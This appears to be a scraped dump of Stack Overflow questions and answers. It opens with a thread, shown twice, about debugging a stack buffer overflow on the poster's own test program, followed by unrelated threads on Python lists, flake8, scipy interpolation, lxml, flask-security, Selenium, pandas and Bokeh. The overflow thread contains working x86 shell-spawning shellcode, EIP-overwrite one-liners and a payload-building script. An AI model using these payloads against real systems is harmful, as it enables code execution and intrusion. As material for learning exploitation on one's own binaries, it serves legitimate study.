}
</code></pre>
<p>I'm trying to overflow with this code:</p>
<pre><code>$(python -c "print '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' + 'A'*237 + 'c8f4ffbf'.decode('hex')")
</code></pre>
<p>When I overflow the stack, I successfully overwrite EIP with my wanted address but then nothing happens. It doesn't execute my shellcode.</p>
<p>Does anyone see the problem? Note: My python may be wrong.</p>
<hr>
<p>UPDATE</p>
<p>What I don't understand is why my code is not executing. For instance if I point eip to nops, the nops never get executed. Like so, </p>
<pre><code>$(python -c "print '\x90'*50 + 'A'*210 + '\xc8\xf4\xff\xbf'")
</code></pre>
<hr>
<p>UPDATE</p>
<p>Could someone be kind enough to exploit this overflow yourself on linux
x86 and post the results?</p>
<hr>
<p>UPDATE</p>
<p>Nevermind ya'll, I got it working. Thanks for all your help.</p>
<hr>
<p>UPDATE</p>
<p>Well, I thought I did. I did get a shell, but now I'm trying again and I'm having problems.</p>
<p>All Im doing is overflowing the stack at the beginning and pointing my shellcode there.</p>
<p>Like so,</p>
<pre><code>r $(python -c 'print "A"*260 + "\xcc\xf5\xff\xbf"')
</code></pre>
<p>This should point to the A's. Now what I dont understand is why my address at the end gets changed in gdb.</p>
<p>This is what gdb gives me,</p>
<pre><code>Program received signal SIGTRAP, Trace/breakpoint trap.
0xbffff5cd in ?? ()
</code></pre>
<p>The \xcc gets changed to \xcd. Could this have something to do with the error I get with gdb?</p>
<p>When I fill that address with "B"'s for instance it resolves fine with \x42\x42\x42\x42. So what gives?</p>
<p>Any help would be appreciated.</p>
<p>Also, I'm compiling with the following options:</p>
<pre><code>gcc -fno-stack-protector -z execstack -mpreferred-stack-boundary=2 -o so so.c
</code></pre>
<p>It's really odd because any other address works except the one I need.</p>
<hr>
<p>UPDATE</p>
<p>I can successfully spawn a shell with the following in gdb,</p>
<pre><code>$(python -c "print '\x90'*37 +'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' + 'A'*200 + '\xc8\xf4\xff\xbf'")
</code></pre>
<p>But I don't understand why this works sometimes and doesn't work other times. Sometimes my overwritten eip is changed by gdb. Does anyone know what I am missing? Also, I can only spawn a shell in gdb and not in the normal process. And on top of that, I can only seem to start a shell once in gdb and then gdb stops working.</p>
<p>For instance, now when I run the following I get this in gdb...</p>
<pre><code>Starting program: /root/so $(python -c 'print "A"*260 + "\xc8\xf4\xff\xbf"')
Program received signal SIGSEGV, Segmentation fault.
0xbffff5cc in ?? ()
</code></pre>
<p>This seems to be caused by execstack being turned on.</p>
<hr>
<p>UPDATE</p>
<p>Yeah, for some reason I'm getting different results but the exploit is working now. So thank you everyone for your help. If anyone can explain the results I received above, I'm all ears. Thanks.</p>
| 5 | 2016-09-27T19:14:19Z | 39,738,856 | <p>There are several protections against this kind of attack, some applied straight from the compiler. For example, your stack may not be executable.</p>
<p><code>readelf -l <filename></code> </p>
<p>if your output contains something like this:</p>
<p><code>GNU_STACK 0x000000 0x00000000 0x00000000 0x00000 0x00000 RW 0x4</code></p>
<p>this means that you can only read and write on the stack (so you should "return to libc" to spawn your shell).</p>
<p>Also there could be canary protection, meaning there is a part of the memory between your variables and the instruction pointer that contains a value checked for integrity; if it is overwritten by your string, the program will exit.</p>
<p>If you are trying this on your own program, consider removing some of the protections with gcc options: </p>
<p><code>gcc -z execstack</code></p>
<p>Also, a note on your assembly: you usually include nops before your shellcode, so you don't have to target the exact address where your shellcode starts.</p>
<p><code>$(python -c "print '\x90'*37 +'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' + 'A'*200 + '\xc8\xf4\xff\xbf'")</code></p>
<p>Note that the address placed in the instruction pointer does not have to point at the exact beginning of your buffer; you can modify the last hex digits to land somewhere inside your nops instead.</p>
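<p>To make the layout concrete, here is a small Python sketch of how such a payload is usually assembled (NOP sled, then shellcode, then padding, then the overwritten return address). The buffer size, sled size and return address below are assumptions for illustration; adjust them to your own binary:</p>

```python
import struct

# Hypothetical numbers: a 260-byte distance to the saved return address on a
# 32-bit little-endian target. These values are illustrative only; measure
# the real offsets in your own binary.
shellcode = (b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
             b"\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80")
ret_addr = 0xbffff4c8   # a guess that lands somewhere inside the NOP sled
distance = 260          # bytes from the start of the buffer to the saved EIP

nops = b"\x90" * 37     # landing anywhere in the sled slides into the shellcode
padding = b"A" * (distance - len(nops) - len(shellcode))
payload = nops + shellcode + padding + struct.pack("<I", ret_addr)

assert len(payload) == distance + 4   # exactly overwrites the 4-byte saved EIP
```

<p>Packing the address with <code>struct.pack("&lt;I", ...)</code> avoids typing the byte string backwards by hand, which is easy to get wrong.</p>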
<p>Of course <code>gdb</code> should become your best friend if you are trying something
like that. </p>
<p>Hope this helps.</p>
| 2 | 2016-09-28T05:41:21Z | [
"python",
"c",
"stack-overflow",
"buffer-overflow"
]
|
Why is my stack buffer overflow exploit not working? | 39,732,600 | <p>So I have a really simple stackoverflow:</p>
<pre><code>#include <stdio.h>
int main(int argc, char *argv[]) {
char buf[256];
memcpy(buf, argv[1],strlen(argv[1]));
printf(buf);
}
</code></pre>
<p>I'm trying to overflow with this code:</p>
<pre><code>$(python -c "print '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' + 'A'*237 + 'c8f4ffbf'.decode('hex')")
</code></pre>
<p>When I overflow the stack, I successfully overwrite EIP with my wanted address but then nothing happens. It doesn't execute my shellcode.</p>
<p>Does anyone see the problem? Note: My python may be wrong.</p>
<hr>
<p>UPDATE</p>
<p>What I don't understand is why my code is not executing. For instance if I point eip to nops, the nops never get executed. Like so, </p>
<pre><code>$(python -c "print '\x90'*50 + 'A'*210 + '\xc8\xf4\xff\xbf'")
</code></pre>
<hr>
<p>UPDATE</p>
<p>Could someone be kind enough to exploit this overflow yourself on linux
x86 and post the results?</p>
<hr>
<p>UPDATE</p>
<p>Nevermind ya'll, I got it working. Thanks for all your help.</p>
<hr>
<p>UPDATE</p>
<p>Well, I thought I did. I did get a shell, but now I'm trying again and I'm having problems.</p>
<p>All I'm doing is overflowing the stack at the beginning and pointing my shellcode there.</p>
<p>Like so,</p>
<pre><code>r $(python -c 'print "A"*260 + "\xcc\xf5\xff\xbf"')
</code></pre>
<p>This should point to the A's. Now what I don't understand is why my address at the end gets changed in gdb.</p>
<p>This is what gdb gives me,</p>
<pre><code>Program received signal SIGTRAP, Trace/breakpoint trap.
0xbffff5cd in ?? ()
</code></pre>
<p>The \xcc gets changed to \xcd. Could this have something to do with the error I get with gdb?</p>
<p>When I fill that address with "B"'s for instance it resolves fine with \x42\x42\x42\x42. So what gives?</p>
<p>Any help would be appreciated.</p>
<p>Also, I'm compiling with the following options:</p>
<pre><code>gcc -fno-stack-protector -z execstack -mpreferred-stack-boundary=2 -o so so.c
</code></pre>
<p>It's really odd because any other address works except the one I need.</p>
<hr>
<p>UPDATE</p>
<p>I can successfully spawn a shell with the following in gdb,</p>
<pre><code>$(python -c "print '\x90'*37 +'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' + 'A'*200 + '\xc8\xf4\xff\xbf'")
</code></pre>
<p>But I don't understand why this works sometimes and doesn't work other times. Sometimes my overwritten eip is changed by gdb. Does anyone know what I am missing? Also, I can only spawn a shell in gdb and not in the normal process. And on top of that, I can only seem to start a shell once in gdb and then gdb stops working.</p>
<p>For instance, now when I run the following I get this in gdb...</p>
<pre><code>Starting program: /root/so $(python -c 'print "A"*260 + "\xc8\xf4\xff\xbf"')
Program received signal SIGSEGV, Segmentation fault.
0xbffff5cc in ?? ()
</code></pre>
<p>This seems to be caused by execstack being turned on.</p>
<hr>
<p>UPDATE</p>
<p>Yeah, for some reason I'm getting different results but the exploit is working now. So thank you everyone for your help. If anyone can explain the results I received above, I'm all ears. Thanks.</p>
| 5 | 2016-09-27T19:14:19Z | 39,783,069 | <p>I was having similar problems when trying to perform a stack buffer overflow. I found that my return address in GDB was different than that in a normal process. What I did was add the following:</p>
<pre><code>unsigned long printesp(void){
__asm__("movl %esp,%eax");
}
</code></pre>
<p>I called it at the end of <code>main</code>, right before the return, to get an idea of where the stack was. From there I just played with that value, subtracting 4 from the printed ESP until it worked.</p>
| 0 | 2016-09-30T03:12:14Z | [
"python",
"c",
"stack-overflow",
"buffer-overflow"
]
|
Can't a list have symbols in it? | 39,732,608 | <p>I have not done python before (only javascript). I am finding the docs alien and the other stackoverflow posts on <code>list.pop()</code> even more cryptic!</p>
<p>my args are <code>'0','0','0','0','0000'</code></p>
<p>here's my code:</p>
<pre><code>i=['.','.','.',':','']
host=''
for v in sys.argv[1:]:
    host=host+str(v)+str(i.pop())
host=host[:-1]
print host
</code></pre>
<p>I'm trying to get <code>'0.0.0.0:0000'</code></p>
<p>But instead I get: <code>IndexError: pop from empty list</code></p>
<p><a href="https://repl.it/DirH/1" rel="nofollow">https://repl.it/DirH/1</a></p>
<p>The reason I ask is that I can't find any SO questions where the list is symbols <strong>and</strong> the list is declared in plain writing!</p>
| 3 | 2016-09-27T19:14:46Z | 39,732,652 | <p>You <em>can</em> put pretty much whatever you want in a list. It's likely that your <code>sys.argv</code> is too long (even after slicing off the first element).</p>
<p>e.g. if <code>len(sys.argv[1:]) == 6</code> and <code>len(i) == 5</code> than by the time you get to the last element in the <code>for</code> loop, <code>i</code> will be empty. This appears to be the case from the code you posted in the link.</p>
<p>Also note that you're probably better off using <code>zip</code>:</p>
<pre><code>lst = ['.','.','.',':','']
for v, ii in zip(sys.argv[1:], lst): # possibly reversed(i) if you meant to pop off the left side of the list rather than the end?
    host += str(v) + str(ii)
</code></pre>
<p>Or (more efficiently):</p>
<pre><code>host = ''.join(j+ii for j, ii in zip(sys.argv[1:], lst))
</code></pre>
<p>Of course, you still likely end up with incorrect output (even with <code>zip</code>) if the input lists aren't the correct lengths -- However, you won't get an exception, just a shorter output string than you might be expecting since <code>zip</code> truncates when one of the iterables is exhausted.</p>
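<p>A quick self-contained run of the <code>zip</code> approach (with <code>argv</code> simulated as a plain list, since the script name in <code>argv[0]</code> is skipped), including that truncation behaviour:</p>

```python
# argv simulated as a plain list; in a real script this would be sys.argv.
argv = ['script.py', '0', '0', '0', '0', '0000']
lst = ['.', '.', '.', ':', '']

host = ''.join(v + sep for v, sep in zip(argv[1:], lst))
print(host)  # 0.0.0.0:0000

# zip stops at the shorter iterable, so a surplus argument is silently
# dropped instead of raising IndexError the way pop() on an empty list does.
extra = ''.join(v + sep for v, sep in zip(argv[1:] + ['9'], lst))
print(extra)  # still 0.0.0.0:0000
```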
| 4 | 2016-09-27T19:18:28Z | [
"python"
]
|
Can't a list have symbols in it? | 39,732,608 | <p>I have not done python before (only javascript). I am finding the docs alien and the other stackoverflow posts on <code>list.pop()</code> even more cryptic!</p>
<p>my args are <code>'0','0','0','0','0000'</code></p>
<p>here's my code:</p>
<pre><code>i=['.','.','.',':','']
host=''
for v in sys.argv[1:]:
    host=host+str(v)+str(i.pop())
host=host[:-1]
print host
</code></pre>
<p>I'm trying to get <code>'0.0.0.0:0000'</code></p>
<p>But instead I get: <code>IndexError: pop from empty list</code></p>
<p><a href="https://repl.it/DirH/1" rel="nofollow">https://repl.it/DirH/1</a></p>
<p>The reason I ask is that I can't find any SO questions where the list is symbols <strong>and</strong> the list is declared in plain writing!</p>
| 3 | 2016-09-27T19:14:46Z | 39,732,686 | <pre><code>a=['script','location','00','11','22','33','4444']
i=['.','.','.',':','',''] # added an extra ''
host=''
for v in a[1:]:
    host=host+str(v)+i.pop(0)
print (host)
</code></pre>
<p>Something like this? I changed it to pop(0) because you want the start, not the end. Your issue was that you were trying to pop more items than there were. </p>
| 2 | 2016-09-27T19:20:17Z | [
"python"
]
|
Can't a list have symbols in it? | 39,732,608 | <p>I have not done python before (only javascript). I am finding the docs alien and the other stackoverflow posts on <code>list.pop()</code> even more cryptic!</p>
<p>my args are <code>'0','0','0','0','0000'</code></p>
<p>here's my code:</p>
<pre><code>i=['.','.','.',':','']
host=''
for v in sys.argv[1:]:
    host=host+str(v)+str(i.pop())
host=host[:-1]
print host
</code></pre>
<p>I'm trying to get <code>'0.0.0.0:0000'</code></p>
<p>But instead I get: <code>IndexError: pop from empty list</code></p>
<p><a href="https://repl.it/DirH/1" rel="nofollow">https://repl.it/DirH/1</a></p>
<p>The reason I ask is that I can't find any SO questions where the list is symbols <strong>and</strong> the list is declared in plain writing!</p>
| 3 | 2016-09-27T19:14:46Z | 39,733,220 | <p>It seems what you want is simple: join everything with dots, except the last part (the port number), which is joined with a colon. Here is another way to do it:</p>
<pre><code>port = sys.argv.pop()
host = '{}:{}'.format('.'.join(sys.argv[1:]), port)
</code></pre>
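<p>Run against the arguments from the question (simulated here as a plain list instead of <code>sys.argv</code>), this produces the expected string:</p>

```python
# Simulating sys.argv: script name first, then the four octets and the port.
argv = ['script.py', '0', '0', '0', '0', '0000']

port = argv.pop()                      # '0000', removed from the end
host = '{}:{}'.format('.'.join(argv[1:]), port)
print(host)  # 0.0.0.0:0000
```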
| 0 | 2016-09-27T19:54:00Z | [
"python"
]
|
Atom editor - linter-flake8: how to specify global "builtins" to ignore | 39,732,615 | <p>I've installed the <a href="https://atom.io/packages/linter-flake8" rel="nofollow">linter-flake8</a> Atom package, and keep getting the following warnings:</p>
<pre><code>F821 - undefined name 'self' at line __ col _
</code></pre>
<p>Following <a href="http://stackoverflow.com/questions/37840142/how-to-avoid-flake8s-f821-undefined-name-when-has-been-installed-by-get">this</a> question, is there a way to specify <code>builtins="self"</code> in Atom?<br>
I can't seem to find it. And if not, is there a workaround?</p>
| 1 | 2016-09-27T19:15:29Z | 39,732,679 | <p>There is a special file, placed in your home directory (or on a per-project basis), called a flake8 file.</p>
<p>For a global version, create a file located at ~/.config/flake8 if it does not already exist.</p>
<p>Within this file add all your customizations; my flake8 file looks like this, for example:</p>
<pre><code>[flake8]
max-line-length = 120
ignore = W293, E402
</code></pre>
<p>So for yours, you'd probably wish to do something similar, with ignore=F821. </p>
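<p>Alternatively, if your flake8 version supports the <code>builtins</code> option, declaring the name is more targeted than silencing F821 everywhere. A sketch of such a config section (whether the option is available depends on your flake8 version):</p>

```ini
[flake8]
# treat "self" as a known builtin name instead of ignoring F821 outright
builtins = self
```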
<p>For a per-project version, please see the flake8 documentation on configuration:</p>
<p><a href="http://flake8.pycqa.org/en/latest/user/configuration.html" rel="nofollow">http://flake8.pycqa.org/en/latest/user/configuration.html</a></p>
<p>Within the page they highlight a number of possible configuration locations. Good luck!</p>
| 0 | 2016-09-27T19:20:07Z | [
"python",
"atom-editor",
"flake8"
]
|
Pandas - how to filter rows based on a regular expression | 39,732,661 | <p>Can you please let me know how to filter rows using Pandas based on a character range like [0-9] or [A-Z].</p>
<p>A case like this, where all the column types are objects:</p>
<pre><code>A     B
2.3   234
4.5   4b6
7b    275
</code></pre>
<p>I would like to check whether all the values in column A are floats, i.e. contain only [0-9] and '.'.
I'm aware of pd.to_numeric, applymap, isreal, isdigit etc., but this is an object column; before I convert it to anything numeric I would like to know the scale of the problem for non-float values.</p>
<p>and which rows in the dataset contain chars other than [0-9].</p>
<p>Thanks in advance
E</p>
| 1 | 2016-09-27T19:18:56Z | 39,732,839 | <p>try this:</p>
<pre><code>In [8]: df
Out[8]:
A B
0 2.3 234
1 4.5 4b6
2 7b 275
3 11 11
In [9]: df.A.str.match(r'^\d*\.*\d*$')
Out[9]:
0 True
1 True
2 False
3 True
Name: A, dtype: bool
In [10]: df.ix[df.A.str.match(r'^\d*\.*\d*$')]
Out[10]:
A B
0 2.3 234
1 4.5 4b6
3 11 11
</code></pre>
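<p>One caveat worth knowing (an observation, not part of the original answer): because every part of <code>^\d*\.*\d*$</code> is optional, it also matches the empty string and strings with repeated dots. A stricter pattern such as <code>^\d+(\.\d+)?$</code> accepts only plain integers and decimals; a quick check with the standard <code>re</code> module:</p>

```python
import re

loose = re.compile(r'^\d*\.*\d*$')
strict = re.compile(r'^\d+(\.\d+)?$')

# The loose pattern accepts some non-numbers:
assert loose.match('')          # empty string matches
assert loose.match('1..2')      # repeated dots match too

# The stricter pattern rejects them:
assert not strict.match('')
assert not strict.match('1..2')

# The stricter pattern still classifies the sample data from the question correctly:
for value, is_float in [('2.3', True), ('4.5', True), ('7b', False), ('11', True)]:
    assert bool(strict.match(value)) == is_float
```

<p>The stricter pattern can be dropped into <code>df.A.str.match()</code> in the same way as above.</p>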
| 0 | 2016-09-27T19:29:13Z | [
"python",
"pandas",
"dataframe"
]
|
Python scipy.interpolate.interp1d not working with large float values | 39,732,724 | <p>I am trying to use <code>scipy.interpolate.interp1d</code> to plot longitude and latitude values to x-coordinate and y-coordinate pixels of a map image. I have sample values:</p>
<pre><code>y = [0, 256, 512, 768, 1024, 1280, 1536]
lat = [615436414755, 615226949459, 615017342897, 614807595000, 614597705702, 614387674936, 614177502635]
x = [0, 256, 512, 768, 1024, 1280, 1536, 1792, 2048, 2304]
lon = [235986328125, 236425781250, 236865234375, 237304687500, 237744140625, 238183593750, 238623046875, 239062500000, 239501953125, 239941406250]
</code></pre>
<p>when I pass to the function like this:</p>
<pre><code>xInterpolation = interp1d(xDegree, xPixel)
yInterpolation = interp1d(yDegree, yPixel)
return (int(xInterpolation(lon)),int(yInterpolation(lat)))
</code></pre>
<p>I get value error:</p>
<blockquote>
<p>ValueError("A value in x_new is above the interpolation " ValueError: A value in x_new is above the interpolation range.</p>
</blockquote>
<p>No matter what value I try, it throws a ValueError. I have even tried giving the same lat or lon values that are in the input list, but that didn't work either. Does anybody know what's happening here? Or am I using the wrong interpolation? </p>
| 0 | 2016-09-27T19:22:16Z | 39,734,259 | <p>From <code>interp1d</code> <a href="http://docs.scipy.org/doc/scipy-0.15.1/reference/generated/scipy.interpolate.interp1d.html" rel="nofollow">docs</a>:</p>
<blockquote>
<p>bounds_error : bool, optional If True, a ValueError is raised any time
interpolation is attempted on a value outside of the range of x (where
extrapolation is necessary). If False, out of bounds values are
assigned fill_value. By default, an error is raised.</p>
</blockquote>
<p>So, some of your interpolation inputs are above the interpolation bound. You are trying to extrapolate, not interpolate. </p>
<p>When you use interpolation like </p>
<p><code>xInterpolation = interp1d(xDegree, xPixel)
xInterpolation(lon)</code></p>
<p>all values from <code>lon</code> must belong to the interval <code>[xDegree.min, xDegree.max]</code>.</p>
<p>So, you need to correct your data for interpolation or use <a href="http://stackoverflow.com/questions/2745329/how-to-make-scipy-interpolate-give-an-extrapolated-result-beyond-the-input-range">extrapolation</a>.</p>
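<p>A minimal sketch of the "correct your data" option: clamp the query points into the known range before interpolating (plain Python here; with numpy, <code>np.clip</code> does the same in one call). The sample numbers come from the question; the helper name is made up for illustration. Alternatively, as the quoted docs say, you can pass <code>bounds_error=False</code> together with a <code>fill_value</code> so out-of-range points no longer raise.</p>

```python
def clamp(values, lo, hi):
    """Force every query point into [lo, hi] so interp1d's bounds check passes."""
    return [min(max(v, lo), hi) for v in values]

x_degree = [235986328125, 239941406250]            # min/max of the known lon grid
lon = [235000000000, 237000000000, 240500000000]   # first and last are out of range

safe_lon = clamp(lon, min(x_degree), max(x_degree))
print(safe_lon)  # [235986328125, 237000000000, 239941406250]
```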
| 1 | 2016-09-27T21:02:26Z | [
"python",
"scipy",
"interpolation"
]
|
Python lxml adding linebreak between specific nodes when creating xml file | 39,732,757 | <p>I am writing an XML file using lxml. I am able to write the entire XML file to one line:</p>
<pre><code><FIXML><Batch Total="3"><Hdr SendTime="2016-09-27T13:32:19-05:00"/><RepeatingNode Price="0.99" RptID="1"><Date Dt="2016-09-20"/></RepeatingNode><RepeatingNode Price="2.49" RptID="2"><Date Dt="2016-09-20"/></RepeatingNode><RepeatingNode Price="0.25" RptID="3"><Date Dt="2016-09-20"/></RepeatingNode></Batch></FIXML>
</code></pre>
<p>and I am able to pretty_print it using the pretty_print parameter:</p>
<pre><code><FIXML>
<Batch Total="3">
<Hdr SendTime="2016-09-27T13:32:19-05:00"/>
<RepeatingNode Price="0.99" RptID="1">
<Date Dt="2016-09-20"/>
</RepeatingNode>
<RepeatingNode Price="2.49" RptID="2">
<Date Dt="2016-09-20"/>
</RepeatingNode>
<RepeatingNode Price="0.25" RptID="3">
<Date Dt="2016-09-20"/>
</RepeatingNode>
</Batch>
</FIXML>
</code></pre>
<p>However, I would like to write to my file and add a linebreak only after each ReapeatingNode. I would also like to avoid any indentation. My ideal output file would look like this:</p>
<pre><code><FIXML>
<Batch Total="3">
<Hdr SendTime="2016-09-27T13:32:19-05:00"/>
<RepeatingNode Price="0.99" RptID="1"><Date Dt="2016-09-20"/></RepeatingNode>
<RepeatingNode Price="2.49" RptID="2"><Date Dt="2016-09-20"/></RepeatingNode>
<RepeatingNode Price="0.25" RptID="3"><Date Dt="2016-09-20"/></RepeatingNode>
</Batch>
</FIXML>
</code></pre>
<p>Below is the framework for my code:</p>
<pre><code>import lxml.etree as et
fixml_node = et.Element("FIXML")
batch_node = et.SubElement(fixml_node, "Batch")
et.SubElement(batch_node, "Hdr")
for row in data:
    repeating_node = et.SubElement(batch_node, "RepeatingNode")
    et.SubElement(repeating_node, "Date")
complete_new_file = et.ElementTree(fixml_node)
complete_new_file.write("output_file")
# or below when pretty-printing
complete_new_file.write("output_file", pretty_print=True)
</code></pre>
<p>Any suggestions how I can achieve my desired output?</p>
| 0 | 2016-09-27T19:24:42Z | 39,734,229 | <p>My solution is to ignore the pretty_print param and add a text or tail with a linebreak where applicable. New code below:</p>
<pre><code>import lxml.etree as et
fixml_node = et.Element("FIXML")
fixml_node.text = "\n"
batch_node = et.SubElement(fixml_node, "Batch")
batch_node.text = "\n"
batch_node.tail = "\n"
header_node = et.SubElement(batch_node, "Hdr")
header_node.tail = "\n"
for row in data:
repeating_node = et.SubElement(batch_node, "RepeatingNode")
repeating_node.tail = "\n"
et.SubElement(repeating_node, "Date")
complete_new_file = et.ElementTree(fixml_node)
complete_new_file.write("output_file")
</code></pre>
<p>This is an easy way to customize the positioning of linebreaks throughout the file. I'll leave this question open for a day or two to see if anyone has a better solution.</p>
| 0 | 2016-09-27T21:00:51Z | [
"python",
"xml",
"lxml"
]
|
No confirmation link in flask security | 39,732,768 | <p>I am using flask_security to do registration in a flask app. When registering an email address an confirmation mail is sent, but it does not include a confirmation link.</p>
<p>I did not find an option to activate this and there is not much documentation about it.</p>
<p>The current configuration is</p>
<pre><code>app = Flask(__name__)
app.config["DEBUG"] = True
app.config["SECRET_KEY"] = "..."
app.config["SECURITY_REGISTERABLE"] = True
app.config["SECURITY_RECOVERABLE"] = True
app.config["SECURITY_TRACKABLE"] = True
app.config["SECURITY_CHANGEABLE"] = True
app.config["SECURITY_PASSWORD_HASH"] = "sha512_crypt"
app.config["SECURITY_PASSWORD_SALT"] = "..."
app.config["SECURITY_CONFIRM_LOGIN_WITHOUT_CONFIRMATION"] = False
app.config["MAIL_SERVER"] = "smtp.gmail.com"
app.config["MAIL_PORT"] = 465
app.config["MAIL_USE_SSL"] = True
app.config["MAIL_USERNAME"] = "..."
app.config["MAIL_PASSWORD"] = "..."
app.config["SQLALCHEMY_DATABASE_URI"] = "sqlite:////tmp/flaskpage.db"
app.config["SQLALCHEMY_TRACK_MODIFICATIONS"] = False
</code></pre>
| 0 | 2016-09-27T19:25:20Z | 39,733,031 | <p>You haven't set all the settings that you should. From the <a href="https://pythonhosted.org/Flask-Security/configuration.html#feature-flags" rel="nofollow">docs</a>:</p>
<blockquote>
<p><code>SECURITY_CONFIRMABLE</code></p>
<p>Specifies if users are required to confirm their email address when registering a new account. If this value is True, Flask-Security creates an endpoint to handle confirmations and requests to resend confirmation instructions. The URL for this endpoint is specified by the <code>SECURITY_CONFIRM_URL</code> configuration option. Defaults to <code>False</code>.</p>
</blockquote>
<p>You can also look at the code; it actually uses this value when registering your user. From the <a href="https://github.com/mattupstate/flask-security/blob/develop/flask_security/registerable.py#L26-L41" rel="nofollow">source code</a>:</p>
<blockquote>
<pre><code>confirmation_link, token = None, None
...
if _security.confirmable:
confirmation_link, token = generate_confirmation_link(user)
do_flash(*get_message('CONFIRM_REGISTRATION', email=user.email))
</code></pre>
</blockquote>
<p>So because <code>SECURITY_CONFIRMABLE</code> is not set, and its default is <code>False</code>, you are getting no link.</p>
| 1 | 2016-09-27T19:41:43Z | [
"python",
"flask",
"flask-security"
]
|
Selenium Python : Unable to get element by id/name/css selector | 39,732,777 | <p>For a school project, I'm trying to create a Python Script which is able to fill in different forms, from different websites.</p>
<p>Here is the thing: for some kinds of websites, I'm not able to catch the form elements with Selenium.
E.g. on this website: <a href="http://www.top-office.com/jeu" rel="nofollow">http://www.top-office.com/jeu</a>
When I inspect the page with Firefox, the input "Name" box has the id "lastname", but Selenium is not able to get it. And when I display the html code of this page, the form looks like it is included from another page or something.</p>
<p>I tried to getelementbyid, byname, bycssselector, etc.
I also tried to wait for the page to be entirely loaded by using WebDriverWait(driver, 5), but it still does not work.</p>
<p>Do you have any solutions or suggestions ?</p>
<p>PS : Even with javascript, I'm not able to get this element by id</p>
<p>Thanks</p>
| 1 | 2016-09-27T19:26:11Z | 39,732,968 | <p>The element that you are trying to interact with is inside of an iframe. You need to use the <code>driver.switch_to_frame()</code> method in order to switch the driver to focus on that iframe. Only when it has switched into that iframe can it interact with its elements. </p>
<p>See <a href="http://stackoverflow.com/questions/7534622/selecting-an-iframe-using-python-selenium">this post</a> on how to use it. You can locate the iframe using xpath, like this: <code>//iframe[@src = 'https://adbx.me/grandjeuclubmed/']</code>. Then, you can use the code mentioned in the post I gave you.</p>
| 1 | 2016-09-27T19:37:19Z | [
"javascript",
"jquery",
"python",
"selenium"
]
|
Python Bokeh table columns and headers don't line up | 39,732,842 | <p>I am trying to display a table in a jupyter notebook using python and the visualization library <a href="http://bokeh.pydata.org/en/0.10.0/index.html">Bokeh</a>. I use the following code to display my table in a jupyter notebook, where <strong>result</strong> is a dataframe:</p>
<pre><code>source = ColumnDataSource(result)
columns = [
    TableColumn(field="ts", title="Timestamp"),
    TableColumn(field="bid_qty", title="Bid Quantity"),
    TableColumn(field="bid_prc", title="Bid Price"),
    TableColumn(field="ask_prc", title="Ask Price"),
    TableColumn(field="ask_qty", title="Ask Quantity"),
]
data_table = DataTable(source=source, columns=columns, fit_columns=True, width=1300, height=800)
show(widgetbox([data_table], sizing_mode = 'scale_both'))
</code></pre>
<p>Previously I was using vform, although this now seems to be deprecated and no longer works as expected either. This occurred after my jupyter notebook version was updated. Regardless of what I set the width to, my column headers don't line up and have a weird overlap with the table:</p>
<p><a href="http://i.stack.imgur.com/aHAL0.png"><img src="http://i.stack.imgur.com/aHAL0.png" alt="enter image description here"></a></p>
<p>This did not happen before, I was able to get a nice table where everything lined up. Even if I adjust the headers they still wont line up. This does not happen when I save the table as an html file instead of calling show() directly in the Jupyter notebook. What do I need to change? Is there a better way to do this?</p>
<p><strong>Full Example</strong></p>
<pre><code>from bokeh.io import show, output_notebook
from bokeh.layouts import widgetbox
from bokeh.models import ColumnDataSource
from bokeh.models.widgets import TableColumn, DataTable
import pandas as pd
output_notebook()
d = {'one' : pd.Series([1., 2., 3.], index=['a', 'b', 'c']),
     'two' : pd.Series([1., 2., 3., 4.], index=['a', 'b', 'c', 'd'])}
df = pd.DataFrame(d)
source = ColumnDataSource(df)
columns = [
    TableColumn(field="one", title="One"),
    TableColumn(field="two", title=" Two"),
]
data_table = DataTable(source=source, columns=columns,
                       fit_columns=True, width=800, height=800)
show(widgetbox([data_table], sizing_mode = 'scale_both'))
</code></pre>
<p>This is running on a system with the following versions:</p>
<ul>
<li>Jupyter 4.2.0 </li>
<li>Python 2.7.12 (Anaconda 2.3.0 64 bit)</li>
<li>Bokeh 0.12.2</li>
</ul>
| 7 | 2016-09-27T19:29:22Z | 39,897,690 | <p>The css styling of Bokeh widgets for Jupyter notebooks is in <a href="http://cdn.pydata.org/bokeh/release/bokeh-widgets-0.12.0.min.css" rel="nofollow">http://cdn.pydata.org/bokeh/release/bokeh-widgets-0.12.0.min.css</a>, where <code>height:16px</code> for elements <code>.bk-root .bk-slick-header-column.bk-ui-state-default</code> is hardcoded. So it cannot be changed without changing the css. </p>
<p>It can be styled ad hoc with the <code>HTML</code> function:</p>
<pre><code>from IPython.core.display import HTML
HTML("""
<style>
.bk-root .bk-slick-header-column.bk-ui-state-default {
height: 25px!important;
}
</style>
""")
</code></pre>
<p>For a persistent change, the css can be added to the <code>custom</code> directory in the Jupyter config directory. You can figure out where that is by calling </p>
<pre><code>jupyter --config-dir
</code></pre>
<p>By default it is <code>~/.jupyter</code>, so the new css then needs to be in <code>~/.jupyter/custom/custom.css</code>.</p>
<p>Before<a href="http://i.stack.imgur.com/2vyXx.png" rel="nofollow"><img src="http://i.stack.imgur.com/2vyXx.png" alt="enter image description here"></a></p>
<p>After<a href="http://i.stack.imgur.com/a7EAU.png" rel="nofollow"><img src="http://i.stack.imgur.com/a7EAU.png" alt="enter image description here"></a></p>
| 2 | 2016-10-06T13:43:39Z | [
"python",
"ipython",
"jupyter",
"bokeh"
]
|
Numpy array manipulation within range of columns and rows | 39,732,957 | <p>I have a numpy boolean 2D array that represents a grayscale image which is essentially an unfilled shape (triangle, square, circle) consisting of <code>True</code> for white pixels, and <code>False</code> for black pixels. I would like to add a black fill by modifying the white pixels to black pixels.</p>
